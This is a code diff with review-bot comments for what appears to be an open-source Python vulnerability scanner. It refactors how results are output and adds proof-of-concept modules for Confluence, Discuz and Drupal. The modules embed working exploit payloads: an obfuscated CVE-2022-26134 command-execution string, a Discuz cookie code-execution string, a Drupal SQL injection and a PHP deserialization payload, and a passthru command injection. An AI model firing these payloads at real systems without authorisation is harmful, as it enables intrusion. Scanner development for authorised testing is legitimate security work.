- results_info_list.append(json.dumps(results_info, indent=4) + '\n')
+ # * Response对象不能json化, 转为字符串
+ for key in result_info.keys():
+ if type(result_info[key]) == requests.models.Response:
+ result_info[key] = output_res(result_info[key], iscolor=False)
+
+ results_info_list.append(json.dumps(result_info, indent=4) + '\n')
results_info_list = set(results_info_list)
if results_info_list:
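Review bot: The new Response-conversion loop compares `type(result_info[key]) == requests.models.Response`; `isinstance` is the idiom and also handles subclasses, and iterating `.items()` avoids the repeated lookup: `for key, value in result_info.items():` / `if isinstance(value, requests.models.Response):` / `result_info[key] = output_res(value, iscolor=False)`. The same `type(...) ==` comparison is added in `output_vul_info_color` and `output_vul_info` in the next two hunks. `output_json` starts and ends outside this hunk.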
@@ -103,27 +115,17 @@ def output_vul_info_color(result):
for key, value in result.items():
value_type = type(value) # * 保存value类型
- # * key: value
if value_type == str: # * str输出方式
- result_info += color.yellow_ex(key) + color.reset(': ' + value + '\n| ')
- # * key: value1, value2, value3
+ result_info += output_str(key, value)
+
elif value_type == list: # * list输出方式
- result_info += color.yellow_ex(key) + color.reset(': ')
- for v in value:
- result_info += v + ' '
- result_info += '\n| '
- # * key1: value1
- # * key2: value2
- # * ...
+ result_info += output_list(key, value)
+
elif value_type == dict: # * dict输出方式
- result_info += '\r| ' + color.red_ex(key) + color.reset(':\t' + '\n')
- for k_father, v_father in value.items():
- if ('Headers' == k_father):
- result_info += '| ' + color.yellow_ex(k_father + ':\n')
- for k_child, v_child in v_father.items():
- result_info += '| ' + color.yellow_ex(k_child) + color.reset(': ' + v_child + '\n')
- else:
- result_info += '| ' + color.yellow_ex(k_father) + color.reset(': ' + v_father + '\n')
+ result_info += output_dict(key, value)
+
+ elif value_type == requests.models.Response: # * Response输出方式
+ result_info += output_res(value)
return result_info
@@ -133,21 +135,108 @@ def output_vul_info(result):
for key, value in result.items():
value_type = type(value)
if value_type == str:
- result_info += key + ': ' + value + '\n| '
+ result_info += output_str(key, value, iscolor=False)
elif value_type == list:
- result_info += key + ': '
- for v in value:
- result_info += v + ' '
- result_info += '\n| '
+ result_info += output_list(key, value, iscolor=False)
elif value_type == dict:
- result_info += key + ':\t' + '\n'
- for k_father, v_father in value.items():
- if ('Headers' == k_father):
- result_info += '| ' + k_father + ':\n'
- for k_child, v_child in v_father.items():
- result_info += '| ' + k_child + ': ' + v_child + '\n'
- else:
- result_info += '| ' + k_father + ': ' + v_father + '\n'
- return result_info
\ No newline at end of file
+ result_info += output_dict(key, value, iscolor=False)
+
+ elif value_type == requests.models.Response:
+ result_info += output_res(value, iscolor=False)
+
+ return result_info
+
+def output_str(key, value, iscolor=True):
+ ''' 接收键值, 返回key: value '''
+ info_str = ''
+
+ if iscolor:
+ info_str += color.yellow_ex(key) + color.reset(': ' + value + '\n| ')
+ else:
+ info_str += key + ': ' + value + '\n| '
+
+ return info_str
+
+def output_list(key, value, iscolor=True):
+ ''' 接收键值, 返回key: value1 value2 value3 '''
+ info_list = ''
+
+ if iscolor:
+ info_list += color.yellow_ex(key) + color.reset(': ')
+ for v in value:
+ info_list += v + ' '
+ info_list += '\n| '
+ else:
+ info_list += key + ': '
+ for v in value:
+ info_list += v + ' '
+ info_list += '\n| '
+
+ return info_list
+
+def output_dict(key, value, iscolor=True):
+ ''' 接收键值, 返回
+ key:
+ key1: value1
+ key2: value2
+ '''
+ info_dict = ''
+
+ if iscolor:
+ info_dict += '\r| ' + color.red_ex(key) + color.reset(':\t' + '\n')
+ for k_father, v_father in value.items():
+ if ('Headers' == k_father):
+ info_dict += '| ' + color.yellow_ex(k_father + ':\n')
+ for k_child, v_child in v_father.items():
+ info_dict += '| ' + color.yellow_ex(k_child) + color.reset(': ' + v_child + '\n')
+ else:
+ info_dict += '| ' + color.yellow_ex(k_father) + color.reset(': ' + v_father + '\n')
+ else:
+ info_dict += key + ':\t' + '\n'
+ for k_father, v_father in value.items():
+ if ('Headers' == k_father):
+ info_dict += '| ' + k_father + ':\n'
+ for k_child, v_child in v_father.items():
+ info_dict += '| ' + k_child + ': ' + v_child + '\n'
+ else:
+ info_dict += '| ' + k_father + ': ' + v_father + '\n'
+
+ return info_dict
+
+def output_res(res, iscolor=True):
+ ''' 接收一个requests结果, 返回一个http数据包 '''
+ info_res = ''
+
+ if iscolor:
+ try:
+ info_res += color.red_ex(' [Request')
+ info_res += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
+ info_res += color.black_ex('\n' + 'Host' + ': ' + logger.get_domain(res.request.url))
+
+ for key, value in res.request.headers.items():
+ info_res += color.black_ex('\n' + key + ': ' + value)
+ if res.request.body:
+ info_res += color.black_ex('\n\n' + res.request.body)
+
+ info_res += color.red_ex(']')
+ info_res += color.reset('\n')
+ except:
+ return info_res
+ else:
+ try:
+ info_res += ' [Request'
+ info_res += '\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str
+ info_res += '\n' + 'Host' + ': ' + logger.get_domain(res.request.url)
+
+ for key, value in res.request.headers.items():
+ info_res += '\n' + key + ': ' + value
+ if res.request.body:
+ info_res += '\n\n' + res.request.body
+
+ info_res += ']'
+ except:
+ return info_res
+
+ return info_res
\ No newline at end of file
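Review bot: `output_res` copies every request header into the rendered packet, so the Cookie header populated from `--cookie` in config.py, and any Authorization header a payload sets, ends up verbatim in the JSON report that `output_json` writes to disk; mask such values before emitting them, e.g. `value = '<redacted>' if key.lower() in ('cookie', 'authorization') else value`. `res.request.body` can be `bytes` for some prepared requests, in which case `'\n\n' + res.request.body` raises `TypeError` that the bare `except:` swallows, silently returning a packet without its body; decode first, `body = body.decode('utf-8', 'replace') if isinstance(body, bytes) else body`, and narrow the handler to `except (AttributeError, TypeError):`. `http.client.HTTPConnection._http_vsn_str` is a private attribute of the stdlib client, not the version requests/urllib3 sent; a module constant `HTTP_VERSION = 'HTTP/1.1'` says the same without the coupling (the same expression appears in logger.py's `logging_4` hunk). The colour and plain branches also duplicate the whole packet-building logic; build the plain lines once and colour them in one place.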
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 254f1e0..9da38f2 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -1,11 +1,11 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-from stringprep import in_table_c3
from lib.initial.config import config
from lib.tool.timed import nowtime
from lib.tool import color
from thirdparty.tqdm import tqdm
+import http.client
class Logger():
def __init__(self):
@@ -62,7 +62,7 @@ def logging_4(self, vul_info, status_code, res):
info_4 = self.logging_2(vul_info, status_code)
try:
info_4 += color.red_ex(' [Request')
- info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + 'HTTP/1.1')
+ info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
for key, value in res.request.headers.items():
@@ -71,6 +71,7 @@ def logging_4(self, vul_info, status_code, res):
info_4 += color.black_ex('\n\n' + res.request.body)
info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
except:
return info_4
return info_4
diff --git a/payloads/AlibabaNacos.py b/payloads/AlibabaNacos.py
index fb4d6f5..ce1f367 100644
--- a/payloads/AlibabaNacos.py
+++ b/payloads/AlibabaNacos.py
@@ -104,12 +104,11 @@ def cve_2021_29441_scan(self, url):
'Payload-See User List': {
'Method': 'GET',
'Path': path,
- 'Headers': headers
},
+ 'Request': res,
'Payload-Add User': {
'Method': 'POST',
- 'Path': 'nacos/v1/auth/users?username=mouse&password=mouse',
- 'Headers': headers
+ 'Path': 'nacos/v1/auth/users?username=mouse&password=mouse'
}
}
return results
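Review bot: The result dict mixes naming schemes: `'Request': res` is inserted between `'Payload-See User List'` and `'Payload-Add User'`, while the APISIX hunk in this commit uses `'Request-1': res1`, every other POC uses `'Payload': res`, and the Flink hunk moves `'Method'` inside `'Payload'` instead of dropping it. Whatever renders these results has to special-case each shape, which gets harder to keep consistent with every POC added. I would settle on one key per role, e.g. `'Payload-See User List': {...}, 'Payload-Add User': {...}, 'Response': res`, and use the same layout in APISIX. Whether `res` is the response of the first request is inferred — its assignment is above the hunk.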
diff --git a/payloads/ApacheAPISIX.py b/payloads/ApacheAPISIX.py
index 4933b2e..d388b03 100644
--- a/payloads/ApacheAPISIX.py
+++ b/payloads/ApacheAPISIX.py
@@ -103,12 +103,16 @@ def cve_2020_13945_scan(self, url):
results = {
'Verify': url + 'mouse',
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
+ 'Payload-1': {
+ 'Method': vul_info['vul_method'],
'Url': url,
'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
+ 'Headers': vul_info['headers'],
+ },
+ 'Request-1': res1,
+ 'Payload-2': {
+ 'Method': 'GET',
+ 'Path': '/mouse'
}
}
return results
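Review bot: `'Path': '/mouse'` in the new `'Payload-2'` entry disagrees with `'Verify': url + 'mouse'` at the top of the same dict: the verify URL is built without a slash, so a reader reconstructing the request from Payload-2 gets a different URL (and a doubled slash if `url` already ends with one). One of the two should be the source of truth; `'Path': 'mouse'` matches how the request is actually built. Whether `res1` is the response of the first request is inferred — its assignment is above the hunk.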
diff --git a/payloads/ApacheFlink.py b/payloads/ApacheFlink.py
index a802afb..db6f4b7 100644
--- a/payloads/ApacheFlink.py
+++ b/payloads/ApacheFlink.py
@@ -83,8 +83,8 @@ def cve_2020_17519_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
'Payload': {
+ 'Method': vul_info['vul_method'],
'Url': url,
'Path': path
}
diff --git a/payloads/ApacheSolr.py b/payloads/ApacheSolr.py
index 33a4e76..e6d4fdf 100644
--- a/payloads/ApacheSolr.py
+++ b/payloads/ApacheSolr.py
@@ -148,12 +148,7 @@ def cve_2021_27905_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
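Review bot: `'Payload': res` drops the `'Method'` key here, whereas the Confluence hunks in this commit keep `'Method'` next to `'Payload': res`; a consumer that reads `results['Method']` will hit a KeyError on Solr but not on Confluence. Storing a live `requests.Response` also means the results are no longer plain data: if they are ever serialised (JSON report, file output) a Response is not serialisable, and it keeps the whole body alive as long as the results list does — the consumer is not in the diff, so this is inferred. Either keep `'Method': vul_info['vul_method']` everywhere or remove it everywhere, and consider storing `res.request` (or the rendered request text the logger already builds) instead of `res`. The same shape is used in the Tomcat, Confluence, Cisco, ElasticSearch, F5-BIG-IP, Fastjson, ShowDoc and Spring hunks.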
diff --git a/payloads/ApacheTomcat.py b/payloads/ApacheTomcat.py
index 7a7490e..85851b9 100644
--- a/payloads/ApacheTomcat.py
+++ b/payloads/ApacheTomcat.py
@@ -90,12 +90,7 @@ def cve_2017_12615_scan(self, url):
'Target': url,
'Verify': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py
index 8aab551..d232180 100644
--- a/payloads/AtlassianConfluence.py
+++ b/payloads/AtlassianConfluence.py
@@ -17,13 +17,15 @@
4. Confluence远程代码执行
CVE-2022-26134
- Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+ Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+ Payload-2: https://github.com/SNCKER/CVE-2022-26134
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
file:///C:/Windows/System32/drivers/etc/hosts
'''
+import base64
from lib.api.dns import dns
from lib.initial.config import config
from lib.tool.md5 import md5, random_md5
@@ -135,6 +137,11 @@ def __init__(self):
'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md),
'data': '',
'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C11
6%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search='+ self.cmd,
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
}
]
@@ -191,12 +198,7 @@ def cve_2019_3396_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
@@ -251,12 +253,7 @@ def cve_2021_26084_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
@@ -313,10 +310,7 @@ def cve_2015_8399_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
+ 'Payload': res
}
return results
@@ -363,15 +357,24 @@ def cve_2022_26134_scan(self, url):
return None
res_md = "'X-Cmd-Response': '" + self.md
- if (res_md in check.check_res(str(res.headers), res_md)):
+ res_md_2 = "'X-Confluence: '" + self.md
+
+ if (self.md in check.check_res(res.headers.get('X-Cmd-Response', ''), self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+ elif (self.md in check.check_res(base64.b64decode(res.headers.get('X-Confluence', '')).decode(), self.md)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
+ 'Response-Headers': 'X-Confluence: XXX',
+ 'Response-Decode': 'Base64',
+ 'Payload': res
}
return results
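Review bot: `base64.b64decode(res.headers.get('X-Confluence', '')).decode()` in the new `elif` raises `binascii.Error` on a value that is not valid base64 and `UnicodeDecodeError` on non-UTF-8 bytes, and nothing in the hunk catches either, so an unexpected header value aborts the scan instead of reporting no match (unless the thread wrapper, which is outside the diff, swallows it). Both are `ValueError` subclasses, so decoding once under `try`/`except ValueError` and feeding the result to the check keeps the behaviour for well-formed values. `res_md` on the context line and the newly added `res_md_2` are not read anywhere in the hunk (`res_md_2` also has its closing quote inside the header name), and the literal `'X-Confluence: XXX'` could carry the real value via `res.headers.get('X-Confluence', '')`. cve_2022_26134_scan continues outside the hunk.
```python
        # … unchanged: request and error handling …
        try:
            x_confluence = base64.b64decode(res.headers.get('X-Confluence', '')).decode()
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
            x_confluence = ''

        if (self.md in check.check_res(res.headers.get('X-Cmd-Response', ''), self.md)):
            # … unchanged: results for the X-Cmd-Response variant …
        elif (self.md in check.check_res(x_confluence, self.md)):
            # … unchanged: results for the base64 X-Confluence variant …
```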
diff --git a/payloads/Cisco.py b/payloads/Cisco.py
index cfb73ba..beb3388 100644
--- a/payloads/Cisco.py
+++ b/payloads/Cisco.py
@@ -77,12 +77,7 @@ def cve_2020_3580_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Discuz.py b/payloads/Discuz.py
new file mode 100644
index 0000000..10d1e0d
--- /dev/null
+++ b/payloads/Discuz.py
@@ -0,0 +1,122 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com
+ Discuz扫描类:
+ 1. Discuz 全局变量防御绕过导致代码执行
+ wooyun-2010-080723
+ Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class Discuz(): # todo 1: 类名(例如 ThinkPHP)
+ ''' 标有数字的地方都需要自己填写 '''
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Discuz' # todo 2: 漏洞框架/应用程序/CMS等(例如 thinkphp)
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.wooyun_2010_080723_payloads = [ # todo 3: Payload的名称(例如 cnvd_2018_24942_payloads)
+ {
+ 'path': 'viewthread.php?tid=10&extra=page%3D1', # todo 4: url路径(例如/admin/login)
+ 'data': '', # todo 5: POST数据, 没有的话可以不写
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ # todo 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的
+ },
+ {
+ 'path': '?tid=10&extra=page%3D1',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ },
+ {
+ 'path': '',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ },
+ ]
+
+ def wooyun_2010_080723_scan(self, url): # todo 7: POC的名称(例如 cnvd_2018_24942_scan)
+ '''
+ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,
+ 导致$_REQUEST中不再包含$_COOKIE,
+ 我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE' # todo 8: 漏洞类型(例如 RCE)
+ vul_info['vul_id'] = 'wooyun-2010-080723' # todo 9: 漏洞编号(例如 CNVD-2018-24942)
+ vul_info['vul_method'] = 'GET' # todo 10: 请求方式(例如 GET)
+
+ for payload in self.wooyun_2010_080723_payloads: # todo 3: 同上, Payload的名称
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get( # todo 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('PHP Version' in res.text) and ('PHP License' in res.text)): # todo 12: 判断扫描结果
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.wooyun_2010_080723_scan, url=url) # todo 6: 同上, POC的名称
+ ]
+
+discuz = Discuz() # todo 1: 同上, 类名
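Review bot: `addscan` builds source text from its arguments and runs it through `eval` (`eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))`), so a target URL or vuln name containing a double quote breaks the expression and whatever follows the quote is evaluated as Python; `return thread(target=getattr(self, '{}_scan'.format(vuln)), url=url)` does the same dispatch without constructing code and raises a clear AttributeError for an unknown name. The identical `eval` is in the new MongoExpress and Nodejs files and in the Drupal addscan context, so it is worth fixing in one pass. The skeleton markers (`# todo 1: 类名` through `# todo 12`) and the unused `dns`, `random_md5`, `check` and `sleep` imports are leftovers from the POC template and should go before the file is merged. wooyun_2010_080723_scan returns `None` implicitly when no payload matches; an explicit `return None` after the loop would make that contract visible.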
diff --git a/payloads/Drupal.py b/payloads/Drupal.py
index 650c21a..fa0d76b 100644
--- a/payloads/Drupal.py
+++ b/payloads/Drupal.py
@@ -8,6 +8,18 @@
CVE-2018-7600
Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7600/
+ 2. Drupal < 7.32 Drupalgeddon SQL 注入
+ CVE-2014-3704
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2014-3704/
+
+ 3. Drupal Core 8 PECL YAML 反序列化任意代码执行
+ CVE-2017-6920
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2017-6920/
+
+ 4. Drupal 远程代码执行
+ CVE-2018-7602
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7602/
+
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''
@@ -18,8 +30,10 @@
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import color
from thirdparty import requests
from time import sleep
+import re
class Drupal():
def __init__(self):
@@ -38,6 +52,39 @@ def __init__(self):
},
]
+ self.cve_2014_3704_payloads = [
+ {
+ 'path': '?q=node&destination=node',
+ 'data': 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
+ }
+ ]
+
+ self.cve_2017_6920_payloads = [
+ {
+ 'path': 'admin/config/development/configuration/single/import',
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ },
+ {
+ 'path': 'config/development/configuration/single/import',
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ }
+ ]
+
+ self.cve_2018_7602_payloads = [
+ {
+ 'path': '?q=%2Fuser%2F1%2Fcancel',
+ 'data': ''
+ },
+ {
+ 'path': '?q=%2Fuser%2F1%2Fcancel&destination=%2Fuser%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3D' + self.cmd,
+ 'data': 'form_id=user_cancel_confirm_form&form_token={}&_triggering_element_name=form_id&op=Cancel+account'
+ },
+ {
+ 'path': '?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F',
+ 'data': 'form_build_id='
+ },
+ ]
+
def cve_2018_7600_scan(self, url):
''' '''
vul_info = {}
@@ -85,10 +132,220 @@ def cve_2018_7600_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
+ 'Payload': res
+ }
+ return results
+
+ def cve_2014_3704_scan(self, url):
+ ''' 7.32之前的Drupal core 7.x中的数据库抽象API中的expandArguments函数,
+ 无法正确构造准备好的语句, 这使得远程攻击者可以通过包含精心制作的密钥的数组进行SQL注入攻击
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SQLinject'
+ vul_info['vul_id'] = 'CVE-2014-3704'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2014_3704_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('DatabaseConnection->escapeLike()' in res.text) and ('XPATH syntax error' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2017_6920_scan(self, url):
+ ''' '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
